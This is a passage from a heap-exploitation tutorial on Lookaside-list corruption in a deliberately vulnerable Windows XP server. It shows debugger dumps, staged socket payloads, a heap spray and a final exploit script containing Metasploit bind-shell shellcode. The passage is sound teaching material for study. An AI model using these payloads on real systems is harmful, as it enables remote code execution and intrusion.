    By crafting two 8 byte parameters for the KSTET and GMON commands, the functions Function 2 and Function 3 will parse them as the second token and use their size to allocate and free respective chunks. The above will allocate two minimum size 8 byte chunks (16 bytes really including the 8 byte header) on the heap. Also, as long as there were no other deallocations on the heap of the same size, chunk B will be placed into Lookaside[2] as a result of the HeapFree.
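
    The size arithmetic behind Lookaside[2] can be checked with a short helper. This is a sketch under the assumptions stated in the text (an 8-byte chunk header and 8-byte granularity); chunk_blocks is a hypothetical name and the formula is meant for request sizes of at least one byte.

```python
HEADER_SIZE = 8   # bytes of chunk header, as described above
GRANULARITY = 8   # heap block size in bytes


def chunk_blocks(user_size):
    """Number of 8-byte blocks a request occupies, header included.
    The result is also the Lookaside index the chunk would use."""
    total = user_size + HEADER_SIZE
    return (total + GRANULARITY - 1) // GRANULARITY
```

    An 8-byte request gives chunk_blocks(8) == 2, matching the 16-byte chunks and the Lookaside[2] entry. Any request from 1 to 8 bytes lands in the same bucket, while a 9-byte request moves to index 3.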

    Let's observe heap behavior in the debugger. I will use the Immunity Debugger for the application debugging with the Heaper plugin for heap analysis. Be sure to run !hidedebug all_debug or an equivalent so that the application will use the Lookaside list.

    Run the application in the Immunity Debugger with breakpoints at 0x004020A6 (call to Function 2 from KSTET) and 0x00401F85 (call to Function 3 from GMON). At the time the first breakpoint is triggered the application will contain several heaps:

    >!heaper dumpheaps
    
    ----------------------------------------
        __
       / /  ___ ___ ____  ___ ____
      / _ \/ -_) _ `/ _ \/ -_) __/
     /_//_/\__/\_,_/ .__/\__/_/
                  /_/
    ----------------------------------------
    by mr_me :: steventhomasseeley@gmail.com
    ------------------------
    Listing available heaps:
    
    Heap: 0x00250000
    Heap: 0x00350000
    Heap: 0x00360000
    Heap: 0x00030000
    Heap: 0x00490000
    ----------------
    

    The heap at 0x00490000 is the private heap obtained by the HeapCreate() call in the main function. Let's look at the heap structure:

    >!heaper analyzeheap 490000
    
    --------------------------------------------------
    Heap structure @ 0x00490000
    --------------------------------------------------
    +0x000 Entry                          : 0x00490000
    +0x008 Signature                      : 0xeeffeeff
    +0x00c Flags                          : 0x00041002
    +0x010 Forceflags                     : 0x00000000
    +0x014 VirtualMemoryThreshold         : 0x0000fe00
    +0x018 SegmentReserve                 : 0x00100000
    +0x01C SegmentCommit                  : 0x00002000
    +0x020 DeCommitFreeBlockThreshold     : 0x00000200
    +0x024 DeCommitTotalBlockThreshold    : 0x00002000
    +0x028 TotalFreeSize                  : 0x0000022f
    +0x02c MaximumAllocationSize          : 0x7ffdefff
    +0x030 ProcessHeapsListIndex          : 0x00000005
    +0x032 HeaderValidateLength           : 0x00000608
    +0x034 HeaderValidateCopy             : 0x00000000
    +0x038 NextAvailableTagIndex          : 0x00000000
    +0x03a MaximumTagIndex                : 0x00000000
    +0x03c TagEntries                     : 0x00000000
    +0x040 UCRSegments                    : 0x00000000
    +0x044 UnusedUncommittedRanges        : 0x00490598
    +0x048 AlignRound                     : 0x0000000f
    +0x04c AlignMask                      : 0xfffffff8
    +0x050 VirtualAllocedBlocks
           VirtualAllocedBlock 1          : 0x00490050
           VirtualAllocedBlock 2          : 0x00490050
    +0x058 Segments
           Segment 1                      : 0x00490000
    +0x158 FreelistBitmap                 : 0x00000000
    +0x16a AllocatorBackTraceIndex        : 0x00000000
    +0x16c NonDedicatedListLength         : 0x00000001
    +0x170 LargeBlocksIndex               : 0x00000000
    +0x174 PseudoTagEntries               : 0x00000000
    +0x178 Freelist[0]                    : 0x00490178
    +0x578 LockVariable                   : 0x00490608
    +0x57c CommitRoutine                  : 0x00000000
    +0x580 FrontEndHeap                   : 0x00490688
    +0x584 FrontHeapLockCount             : 0x00000000
    +0x586 FrontEndHeapType               : 0x00000001
    +0x587 LastSegmentIndex               : 0x00000000
    --------------------------------------------------
    

    Notice that FrontEndHeap points to 0x00490688 (heap base + 0x688), indicating that the Lookaside front end is used by the application.

    Back to the debugger, step over the call to Function 2 at 0x004020A6 and observe the state of the heap:

    >!heaper analysechunks 490000 -f  busy
    
    --------------------------------------------------------------
    Dumping chunks @ heap address: 0x00490000
    Analyzing 1 segments
    - 0x00490000
    --------------------------------------------------------------
    Note: chunks on the lookaside will appear BUSY
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    (+) BUSY chunk @ 0x00490000
    0x00000000
        -> size: 0x00000640  (8 * 0x00c8 = 0x0640, decimal: 1600)
        -> prevsize: 0x00000000 (0000)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490640
    0x00000000
        -> size: 0x00000040  (8 * 0x0008 = 0x0040, decimal: 64)
        -> prevsize: 0x00000640 (00c8)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490680
    0x00000000
        -> size: 0x00001808  (8 * 0x0301 = 0x1808, decimal: 6152)
        -> prevsize: 0x00000040 (0008)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00491e88
    0x00000000
        -> size: 0x00000010  (8 * 0x0002 = 0x0010, decimal: 16)
        -> prevsize: 0x00001808 (0301)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    

    Notice the very last 16 byte BUSY chunk at 0x00491e88. This is the chunk A we have just allocated.

    Continue execution in the debugger and step over the call to Function 3 at 0x00401F85:

    >!heaper analysechunks 490000 -f  busy
    
    --------------------------------------------------------------
    Dumping chunks @ heap address: 0x00490000
    Analyzing 1 segments
    - 0x00490000
    --------------------------------------------------------------
    Note: chunks on the lookaside will appear BUSY
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    (+) BUSY chunk @ 0x00490000
    0x00000000
        -> size: 0x00000640  (8 * 0x00c8 = 0x0640, decimal: 1600)
        -> prevsize: 0x00000000 (0000)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490640
    0x00000000
        -> size: 0x00000040  (8 * 0x0008 = 0x0040, decimal: 64)
        -> prevsize: 0x00000640 (00c8)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490680
    0x00000000
        -> size: 0x00001808  (8 * 0x0301 = 0x1808, decimal: 6152)
        -> prevsize: 0x00000040 (0008)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00491e88
    0x00000000
        -> size: 0x00000010  (8 * 0x0002 = 0x0010, decimal: 16)
        -> prevsize: 0x00001808 (0301)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) Chunk on the Lookaside @ 0x00491e98
        -> Lookaside[0x02] entry
            -> Flink: 0x00491ea0
    0x00000000
        -> size: 0x00000010  (8 * 0x0002 = 0x0010, decimal: 16)
        -> prevsize: 0x00000010 (0002)
        -> flags: 0x0001 (B$)
    --------------------------------------------------------------
    

    As expected, the originally allocated chunk A at 0x00491e88 remains busy, while chunk B was placed on Lookaside[2] with the Flink pointing to 0x00491ea0.

    At this point let's overflow chunk A with the GTER command and overwrite chunk B's flink with a value we control using the payload below:

    # 1) Allocate Chunk A
    s.sendall("KSTET " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free Chunk B
    s.sendall("GMON " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 3) Overflow Chunk A and overwrite Chunk B flink
    s.sendall("GTER " + "A"*8 + "B"*8 + "CCCC")
    print "%s" % s.recv(1024)
    

    As a result of the GTER command above, chunk B's flink should be overwritten with 43434343. Let's confirm it in the debugger by setting a breakpoint at the call to Function 1 at 0x00402173. Once you reach that point step over it and observe the heap:

    >!heaper analysefrontend 490000 -l
    
    ---------------------------------------------------------
    Lookaside List structure @ 0x00490688
    ---------------------------------------------------------
    Lookaside[0x02] - No. of chunks: 1, ListEntry: 0x004906e8, Size: 0x18 (16+8=24)
    
        ****************************************************************************************************
        chunk (1): 0x00491e98, flink: 0x43434343, size: 16962 (0x4242), cookie: 0x42 <= size/chunk corruption detected!
        ****************************************************************************************************
        ********************************************************************************************
        chunk (2): 0x4343433b, flink: 0x00000000, size: 0 (0x00), cookie: 0x0 <= fake chunk created!
        ********************************************************************************************
    
    --------------------------------------------------------------------------------
    

    The Lookaside[2] list was corrupted with the chunk B node pointing to a fake address 0x43434343.
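
    The layout of the overflow string can be made explicit with a small builder. This is a sketch with a hypothetical helper name. It encodes the target as a little-endian DWORD and rejects values containing 0x00 or 0x20, since Function 1 splits its input with strtok on a space and copies it with strcpy.

```python
from struct import pack

BAD_BYTES = bytearray(b"\x00\x20")  # strcpy stops at null, strtok splits on space


def build_gter_overflow(target, fill=b"A", header=b"B"):
    """Build the GTER payload: 8 bytes fill chunk A's user data, 8 bytes
    overwrite chunk B's header, and 4 bytes replace chunk B's flink."""
    flink = pack("<I", target)
    if any(b in BAD_BYTES for b in bytearray(flink)):
        raise ValueError("target address contains a null or space byte")
    return b"GTER " + fill * 8 + header * 8 + flink
```

    build_gter_overflow(0x43434343) reproduces the test string used above. The "B" bytes explain why the plugin reports a chunk size of 0x4242 and a cookie of 0x42: they are sitting in chunk B's header.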

    Now as a final touch let's allocate chunk B again in order to corrupt the Lookaside[2] header followed by another allocation to overwrite the target address with an arbitrary value.

    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 3) Overflow chunk A and overwrite chunk B's flink
    s.sendall("GTER " + "A"*8 + "B"*8 + "CCCC")
    print "%s" % s.recv(1024)
    
    # 4) Allocate chunk B and chunk C. Overwrite the target.
    s.sendall("STATS " + "DDDD")
    print "%s" % s.recv(1024)
    

    The above payload will use the STATS command to allocate two chunks and attempt to write DDDD to the address CCCC. Just as before, let's set a breakpoint at the point where Function 4 is called from the STATS command (address 0x00401C0E) and observe the execution from there.

    After the first call to HeapAlloc, the Lookaside[2] header will be corrupted with a pointer to 0x43434343:

    !heaper analysefrontend 490000 -l
    
    ---------------------------------------------------------
    Lookaside List structure @ 0x00490688
    ---------------------------------------------------------
    Lookaside[0x02] - No. of chunks: 0, ListEntry: 0x004906e8, Size: 0x18 (16+8=24)
    
        ********************************************************************************************
        chunk (1): 0x4343433b, flink: 0x00000000, size: 0 (0x00), cookie: 0x0 <= fake chunk created!
        ********************************************************************************************
    
    --------------------------------------------------------------------------------
    

    As a result, the second call to HeapAlloc for a chunk of the same size will attempt to place chunk C at the address 0x43434343:

    As you can see from the above screenshot, the allocator crashes trying to read from a nonexistent chunk at 0x43434343. However, as you can imagine (and as we will confirm shortly), with a readable address in place of 0x43434343 the allocator would successfully return an attacker-provided address, which would then be used as the destination of the subsequent strcpy call in Function 4.
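
    The two allocations can be modeled in a few lines. The following Python 3 sketch is a toy model of a single lookaside bucket, not the real allocator: memory is a dictionary of readable addresses, and the chunk B pointer and the value stored at the target are hypothetical values chosen for illustration.

```python
class LookasideModel:
    """Toy model of one lookaside bucket: a singly linked LIFO of free chunks."""

    def __init__(self, memory, head=0):
        self.memory = memory  # readable address -> dword stored at that address
        self.head = head      # address of the first free chunk, 0 when empty

    def alloc(self):
        if self.head == 0:
            return None  # empty bucket; the real heap would fall back to the back end
        chunk = self.head
        if chunk not in self.memory:
            # models the access violation seen with 0x43434343
            raise MemoryError("access violation reading 0x%08x" % chunk)
        self.head = self.memory[chunk]  # the new head is whatever the flink holds
        return chunk


def two_allocations(fake_flink, readable):
    """Pop chunk B, then pop whatever its overwritten flink points at."""
    chunk_b = 0x00491EA0            # hypothetical user pointer of chunk B
    memory = {chunk_b: fake_flink}  # flink already overwritten through GTER
    memory.update(readable)
    bucket = LookasideModel(memory, head=chunk_b)
    return bucket.alloc(), bucket.alloc()


# A readable target is handed back to the caller as if it were a heap chunk
first, second = two_allocations(0x004061B0, {0x004061B0: 0x11223344})
print(hex(first), hex(second))
```

    In this model the second allocation returns the attacker-chosen address only when that address is readable; with 0x43434343 the same call raises, mirroring the crash described above.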

    write4 Pointer

    With the ability to write to an arbitrary address, we must now decide which address to overwrite. Considering we are trying to gain arbitrary code execution, the target address must be not only writeable, but also be used as a pointer in a CALL or JMP instruction.

    The classic example of such a pointer is the RtlAcquirePEBLock() pointer located in the PEB structure. Unfortunately, the location of the PEB structure has been pseudo-randomized since XP SP2, so it would not make for a reliable exploit. Another frequently used pointer in write4 exploits is the one used by the WSACleanup() routine:

    However, I would rather avoid corrupting anything related to Windows sockets especially in an exploit where I would like to use a remote shellcode.

    NOTE: You can certainly fix up the overwritten value as part of the shellcode in case you really want to use this particular pointer.

    The approach I took for this particular exploit is to overwrite the IAT entry for memcpy. The advantage of using this particular entry is that it can later be triggered at will with the HELP command, one of the few code blocks utilizing the function. The memcpy entry in the serve_heap application is located at 0x004061B0. You can locate the address of the memcpy entry in the IAT by reviewing the Imports subview in IDA or by using one of the many PE file analysis tools.
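
    Since x86 stores addresses in little-endian order, the target address has to be reversed byte by byte before it is sent. A minimal Python 3 sketch of that conversion using the standard struct module (the helper name pack_le32 is made up for this example):

```python
import struct

MEMCPY_IAT = 0x004061B0  # address of the memcpy IAT entry quoted in the text


def pack_le32(address):
    """Return the 4-byte little-endian encoding of a 32-bit address."""
    return struct.pack("<I", address)


target = pack_le32(MEMCPY_IAT)
print(" ".join("%02x" % byte for byte in target))
```

    The only null byte in the packed value is the last one, so the three significant bytes of the address come first in the payload.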

    Let's update the previous payload to use the memcpy IAT entry as the target address and overwrite it with 0x44444444:

    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 3) Overflow chunk A and overwrite chunk B's flink
    s.sendall("GTER " + "A"*8 + "B"*8 + "\xb0\x61\x40\x00") # 0x004061b0 - memcpy
    print "%s" % s.recv(1024)
    
    # 4) Allocate chunk B and chunk C. Overwrite the target.
    s.sendall("STATS " + "DDDD")
    print "%s" % s.recv(1024)
    
    # 5) Trigger the shellcode
    s.sendall("HELP")
    print "%s" % s.recv(1024)
    

    After overwriting the memcpy IAT entry and triggering it with the HELP command, the application will crash attempting to execute the address 0x44444444:

    Notice that we have used a 4-byte value "DDDD" as opposed to the usual 8 bytes used in prior allocations. This will still work, because the minimum chunk size is 8 bytes (+8 byte header), so any value shorter than 8 bytes will still result in an allocation from Lookaside[2]. This is useful when you need to overwrite precisely 4 bytes at some address without affecting any neighboring values.
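
    The sizing rule can be written down as a small calculation. This Python 3 sketch follows the description above and assumes 8-byte allocation granularity, an 8-byte header, and a bucket index equal to the total chunk size in 8-byte blocks; it is a model for reasoning about sizes, not code taken from the heap manager:

```python
HEADER_SIZE = 8   # chunk header size quoted in the text
GRANULARITY = 8   # assumed allocation granularity of the XP heap


def lookaside_index(request_size):
    """Map a requested byte count to a bucket index, counted in 8-byte blocks."""
    # round the request up to the next multiple of the granularity
    rounded = (request_size + GRANULARITY - 1) // GRANULARITY * GRANULARITY
    return (rounded + HEADER_SIZE) // GRANULARITY


for size in (4, 5, 8, 9):
    print(size, "->", lookaside_index(size))
```

    Under these assumptions every request from 1 to 8 bytes maps to the same bucket, while a 9-byte request already moves to the next one.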

    Great! With the ability to execute an arbitrary address in memory, we are now ready to inject the shellcode.

    Shellcode injection

    There are several locations where we could inject the shellcode; however, let's step up the challenge and assume that DEP is enabled. Recall the initial private heap initialization code segment:

    .text:004012C4 mov     [esp+298h+param3], 0 ; dwMaximumSize
    .text:004012CC mov     [esp+298h+param2], 0 ; dwInitialSize
    .text:004012D4 mov     [esp+298h+param1], 40000h ; flOptions
    .text:004012DB call    _HeapCreate@12  ; HeapCreate(x,x,x)
    .text:004012E0 sub     esp, 0Ch
    .text:004012E3 mov     ds:_hHeap, eax
    

    With flOptions set to 0x00040000 (HEAP_CREATE_ENABLE_EXECUTE), any allocations made using the private heap will be readable, writeable, and most importantly executable. Thus, the private heap is the ideal location for the shellcode.
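
    When reading such a call in a disassembly, it helps to translate the numeric flOptions value back into flag names. A minimal Python 3 sketch, using the three HeapCreate flag values defined in the Windows headers (the function name decode_heap_options is an assumption made for this example):

```python
# HeapCreate flOptions flags as defined in the Windows SDK headers
HEAP_FLAGS = {
    0x00000001: "HEAP_NO_SERIALIZE",
    0x00000004: "HEAP_GENERATE_EXCEPTIONS",
    0x00040000: "HEAP_CREATE_ENABLE_EXECUTE",
}


def decode_heap_options(fl_options):
    """Return the names of the known flags set in an flOptions value."""
    return [name for bit, name in sorted(HEAP_FLAGS.items()) if fl_options & bit]


print(decode_heap_options(0x40000))
```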

    The only way a program can request a chunk on the private heap is through the use of the HeapAlloc function call. The standard malloc call will use the application's default heap that is not executable. Let's use IDA's xrefs view to find all references to the HeapAlloc:

    We can immediately eliminate Function 3, because it can't be used to actually copy data to the heap. This leaves us with either Function 2 or Function 4. All calls to Function 2 limit the maximum size copied to the heap to 100 bytes, which is not ideal for any decently sized shellcode. This leaves us with Function 4. There are two commands which can be used to call Function 4: STATS and HTER. Once again, STATS can only supply a 120-byte buffer to Function 4, leaving us with HTER.

    In order to inject shellcode using HTER we must specially craft it to survive the string to hex conversion. Below is the relevant snippet from the command:

    .text:00402256 mov     [esp+5A8h+param3], 2 ; Size
    .text:0040225E mov     eax, [ebp+offset]
    .text:00402264 add     eax, [ebp+buf1]
    .text:00402267 mov     [esp+5A8h+param2], eax ; Src
    .text:0040226B lea     eax, [ebp+tempstr2] ; copy two bytes
    .text:00402271 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402274 call    _memcpy
    .text:00402279 mov     [esp+5A8h+param3], 16 ; Radix
    .text:00402281 mov     [esp+5A8h+param2], 0 ; EndPtr
    .text:00402289 lea     eax, [ebp+tempstr2]
    .text:0040228F mov     [esp+5A8h+param1], eax ; Str
    .text:00402292 call    _strtoul        ; str -> unsigned long
    

    Let's modify the very first proof of concept payload to send the shellcode to the application:

    shellcode = "cc"*200
    
    # 0) Inject shellcode
    payload = " deadbeef" + "20" + "90"*(2039 - len(shellcode)/2) + shellcode
    s.sendall("HTER " + payload)
    print "%s" % s.recv(1024)
    

    Notice that instead of using the \xCC format to represent bytes, we are using a two-character string "CC", which will be converted to a single byte by the application. We must also compensate for an extra byte being chopped off (recall the off-by-one in the offset parameter) with an extra space before "deadbeef". I have also included the string "20", which will be converted to the whitespace separator used by the strtok function. Incidentally, we must not use the whitespace character anywhere in the shellcode, because strtok will replace that byte with zero, which would cut off the shellcode. Finally, the reason for the number 2039 is to precisely populate the 2048-byte tempbuf: 2039 bytes for NOPs and shellcode, 4 bytes for 0xdeadbeef, and one extra byte for the space separator used by the tokenizer, for a total of 2044 bytes. This should leave us with 4 null bytes at the end of the buffer to properly terminate the loop.
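
    The byte accounting can be verified offline before touching the debugger. The Python 3 sketch below models the conversion as described in this article (one byte lost to the off-by-one, then two hex digits per output byte); the function names are made up for the example, and the model does not reproduce the server's actual code:

```python
def build_hter_argument(shellcode_hex, total=2039):
    """Build the text that follows the HTER command, as in the payload above."""
    nops = "90" * (total - len(shellcode_hex) // 2)
    return " deadbeef" + "20" + nops + shellcode_hex


def model_hter_decode(argument):
    """Model of the described conversion: drop one byte, then decode hex pairs."""
    digits = argument[1:]  # the off-by-one in the offset eats the leading space
    return bytes(int(digits[i:i + 2], 16) for i in range(0, len(digits), 2))


decoded = model_hter_decode(build_hter_argument("cc" * 200))
# split at the first 0x20 byte, the separator the tokenizer would look for
marker, separator, body = decoded.partition(b" ")
print(len(decoded), marker.hex(), len(body))
```

    In this model the decoded buffer is 2044 bytes long, the token after the separator holds the 2039 bytes of NOPs and shellcode, and neither a space nor a null byte appears inside it.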

    Enough theory, let's place a breakpoint at the call to Function 4 from HTER (address 0x004022E5) and observe the two 2048 byte buffers on the heap:

    You can dump information about the two buffers using heaper:

    >!heaper ac 490000 -f busy
    
    --------------------------------------------------------------
    Dumping chunks @ heap address: 0x00490000
    Analyzing 1 segments
    - 0x00490000
    --------------------------------------------------------------
    Note: chunks on the lookaside will appear BUSY
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    (+) BUSY chunk @ 0x00490000
    0x00000000
        -> size: 0x00000640  (8 * 0x00c8 = 0x0640, decimal: 1600)
        -> prevsize: 0x00000000 (0000)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490640
    0x00000000
        -> size: 0x00000040  (8 * 0x0008 = 0x0040, decimal: 64)
        -> prevsize: 0x00000640 (00c8)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490680
    0x00000000
        -> size: 0x00001808  (8 * 0x0301 = 0x1808, decimal: 6152)
        -> prevsize: 0x00000040 (0008)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00491e88
    0x00000000
        -> size: 0x00000800  (8 * 0x0100 = 0x0800, decimal: 2048)
        -> prevsize: 0x00001808 (0301)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00492688
    0x00000000
        -> size: 0x00000800  (8 * 0x0100 = 0x0800, decimal: 2048)
        -> prevsize: 0x00000800 (0100)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    

    After surviving the conversion and tokenization, the strcpy will be called with a destination set to the chunk on the executable heap as illustrated in the memory snapshot after the copy operation:

    Great! The specially crafted shellcode was correctly converted and injected unmolested. Naturally only the second allocation, 0x00492688, will contain the shellcode. The first allocation is simply set to zero. Using this technique, we can inject around 2000 bytes to the executable heap which should be sufficient for any shellcode with a healthy dose of NOPs for reliability.

    Increasing reliability

    We have solved many problems ranging from heap manipulations, to bypassing DEP, to finding a reliable pointer to overwrite. Now let's put the finishing touch on the exploit by making it reliable.

    Let's insert the shellcode injection payload prior to smashing the Lookaside list as follows:

    target = pack("I",0x004061b0) # 0x004061b0 - memcpy
    scaddr = pack("I",0x004926b0) # shellcode address
    
    print "%s" % s.recv(1024)
    shellcode = "cc"*200
    
    # 0) Inject shellcode
    payload = " deadbeef" + "20" + "90"*(2039 - len(shellcode)/2) + shellcode
    s.sendall("HTER " + payload)
    print "%s" % s.recv(1024)
    
    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 3) Overflow chunk A and overwrite chunk B's flink
    s.sendall("GTER " + "A"*8 + "B"*8 + target)
    print "%s" % s.recv(1024)
    
    # 4) Allocate chunk B and chunk C. Overwrite the target.
    s.sendall("STATS " + scaddr)
    print "%s" % s.recv(1024)
    
    # 5) Trigger the shellcode
    s.sendall("HELP")
    print "%s" % s.recv(1024)
    

    Running the above payload against serve_heap will result in an access violation. While debugging, you will notice a strange memory allocation:

    The KSTET parameter used for the call to Function 2 appears to contain a chunk of the "encoded" shellcode. If we look back at the disassembly above, the receiving buffer buf1 is reused for every command without being consistently zeroed out. As a result, any previously received data will persist in memory and potentially corrupt your carefully crafted commands.
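
    The effect is easy to reproduce in isolation. The following Python 3 sketch models a receive buffer that is overwritten from the start but never cleared, and then read the way C string functions read it, up to the first null byte. The buffer size and helper names are arbitrary choices for the illustration:

```python
def receive_into(buf, data):
    """Copy data over the start of buf without clearing the remainder."""
    buf[:len(data)] = data
    return buf


def c_string(buf):
    """Read buf the way C string functions do: up to the first null byte."""
    return bytes(buf).split(b"\x00", 1)[0]


buf = bytearray(64)

# A long command followed by a short one leaves stale bytes behind
receive_into(buf, b"HTER " + b"90" * 20)
receive_into(buf, b"KSTET " + b"A" * 8)
stale = c_string(buf)

# Sending an explicit terminator cuts the stale data off
receive_into(buf, b"HTER " + b"90" * 20)
receive_into(buf, b"KSTET " + b"A" * 8 + b"\x00")
clean = c_string(buf)

print(stale)
print(clean)
```

    In the first case the short KSTET command is followed by leftovers of the earlier HTER data; in the second case the explicit null byte ends the string right after the intended argument.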

    We can fix this issue by adding terminating null bytes to the affected commands:

    target = pack("I",0x004061b0) # 0x004061b0 - memcpy
    scaddr = pack("I",0x004926b0) # shellcode address
    
    print "%s" % s.recv(1024)
    
    shellcode = "\xcc"*200
    shellcode = hexlify(shellcode) # encode shellcode
    
    # 0) Spray the shellcode
    for i in range(20):
        payload = " deadbeef" + "20" + "90"*(2039 - len(shellcode)/2) + shellcode
        s.sendall("HTER " + payload)
        print "%s" % s.recv(1024)
    
    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8 + "\x00")
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8 + "\x00")
    print "%s" % s.recv(1024)
    
    # 3) Overflow chunk A and overwrite chunk B's flink
    s.sendall("GTER " + "A"*8 + "B"*8 + target)
    print "%s" % s.recv(1024)
    
    # 4) Allocate chunk B and chunk C. Overwrite the target.
    s.sendall("STATS " + scaddr)
    print "%s" % s.recv(1024)
    
    # 5) Trigger the shellcode
    s.sendall("HELP" + "\x00")
    

    Notice the addition of a heap spray, which will result in twenty 2048-byte heap chunks containing the shellcode. This was done to account for differences in the base address of private heaps. You can increase exploit reliability by increasing the number of sprayed chunks and adjusting the shellcode address to a more stable one. Running the above payload produces the following output in the debugger:
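
    Whether a hardcoded shellcode address is a good choice comes down to simple range arithmetic. The Python 3 sketch below checks if an address falls inside the NOP sled of a given chunk. It assumes an 8-byte chunk header and that the NOPs start at the very beginning of the chunk's user data; the chunk addresses come from the earlier single-injection heaper dump, and the layout after a full spray may differ:

```python
HEADER_SIZE = 8  # assumed size of the chunk header preceding the user data


def sled_range(chunk_addr, nop_count):
    """Return the [start, end) address range covered by the NOP sled."""
    start = chunk_addr + HEADER_SIZE
    return start, start + nop_count


def hits_sled(address, chunk_addr, nop_count):
    """True if address points into the NOP sled of the chunk at chunk_addr."""
    start, end = sled_range(chunk_addr, nop_count)
    return start <= address < end


SCADDR = 0x004926B0       # shellcode address used in the payload
NOP_COUNT = 2039 - 200    # sled length with the 200-byte int 3 stub

print(hits_sled(SCADDR, 0x00492688, NOP_COUNT))
```

    The same check can be repeated for each chunk address observed in the debugger after the spray to pick an address that lands in a sled across several runs.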

    We have successfully corrupted the Lookaside list, overwritten an IAT pointer, injected shellcode at a reliable location, and finally redirected the execution flow to the shellcode. The execution stopped at the first instance of the int 3 (\xcc) instruction after sliding down several hundred NOPs.

    Finalizing the Exploit

    At this point we can plug in real shellcode in place of the stub:

    #!/usr/bin/env python
    #
    # serve_heap heap overflow exploit
    #    by iphelix [at] thesprawl.org
    # 
    # Tested on Windows XP SP3 with DEP set to AlwaysOn
    
    import sys, socket
    from struct import pack
    from binascii import hexlify
    
    HOST = sys.argv[1]
    PORT = 9999
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    
    target = pack("I",0x004061b0) # 0x004061b0 - memcpy
    scaddr = pack("I",0x004926b0) # shellcode address
    
    # windows/shell_bind_tcp - 368 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
    # EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
    # BADCHARS='\x00\x20'
    shellcode = (
    "\xba\x3b\xaf\x2d\xf2\xda\xd9\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
    "\x56\x31\x56\x13\x03\x56\x13\x83\xee\xc7\x4d\xd8\x0e\xdf\x1b"
    "\x23\xef\x1f\x7c\xad\x0a\x2e\xae\xc9\x5f\x02\x7e\x99\x32\xae"
    "\xf5\xcf\xa6\x25\x7b\xd8\xc9\x8e\x36\x3e\xe7\x0f\xf7\xfe\xab"
    "\xd3\x99\x82\xb1\x07\x7a\xba\x79\x5a\x7b\xfb\x64\x94\x29\x54"
    "\xe2\x06\xde\xd1\xb6\x9a\xdf\x35\xbd\xa2\xa7\x30\x02\x56\x12"
    "\x3a\x53\xc6\x29\x74\x4b\x6d\x75\xa5\x6a\xa2\x65\x99\x25\xcf"
    "\x5e\x69\xb4\x19\xaf\x92\x86\x65\x7c\xad\x26\x68\x7c\xe9\x81"
    "\x92\x0b\x01\xf2\x2f\x0c\xd2\x88\xeb\x99\xc7\x2b\x78\x39\x2c"
    "\xcd\xad\xdc\xa7\xc1\x1a\xaa\xe0\xc5\x9d\x7f\x9b\xf2\x16\x7e"
    "\x4c\x73\x6c\xa5\x48\xdf\x37\xc4\xc9\x85\x96\xf9\x0a\x61\x47"
    "\x5c\x40\x80\x9c\xe6\x0b\xcd\x51\xd5\xb3\x0d\xfd\x6e\xc7\x3f"
    "\xa2\xc4\x4f\x0c\x2b\xc3\x88\x73\x06\xb3\x07\x8a\xa8\xc4\x0e"
    "\x49\xfc\x94\x38\x78\x7c\x7f\xb9\x85\xa9\xd0\xe9\x29\x01\x91"
    "\x59\x8a\xf1\x79\xb0\x05\x2e\x99\xbb\xcf\x59\x9d\x75\x2b\x0a"
    "\x4a\x74\xcb\xbd\xd6\xf1\x2d\xd7\xf6\x57\xe5\x4f\x35\x8c\x3e"
    "\xe8\x46\xe6\x12\xa1\xd0\xbe\x7c\x75\xde\x3e\xab\xd6\x73\x96"
    "\x3c\xac\x9f\x23\x5c\xb3\xb5\x03\x17\x8c\x5e\xd9\x49\x5f\xfe"
    "\xde\x43\x37\x63\x4c\x08\xc7\xea\x6d\x87\x90\xbb\x40\xde\x74"
    "\x56\xfa\x48\x6a\xab\x9a\xb3\x2e\x70\x5f\x3d\xaf\xf5\xdb\x19"
    "\xbf\xc3\xe4\x25\xeb\x9b\xb2\xf3\x45\x5a\x6d\xb2\x3f\x34\xc2"
    "\x1c\xd7\xc1\x28\x9f\xa1\xcd\x64\x69\x4d\x7f\xd1\x2c\x72\xb0"
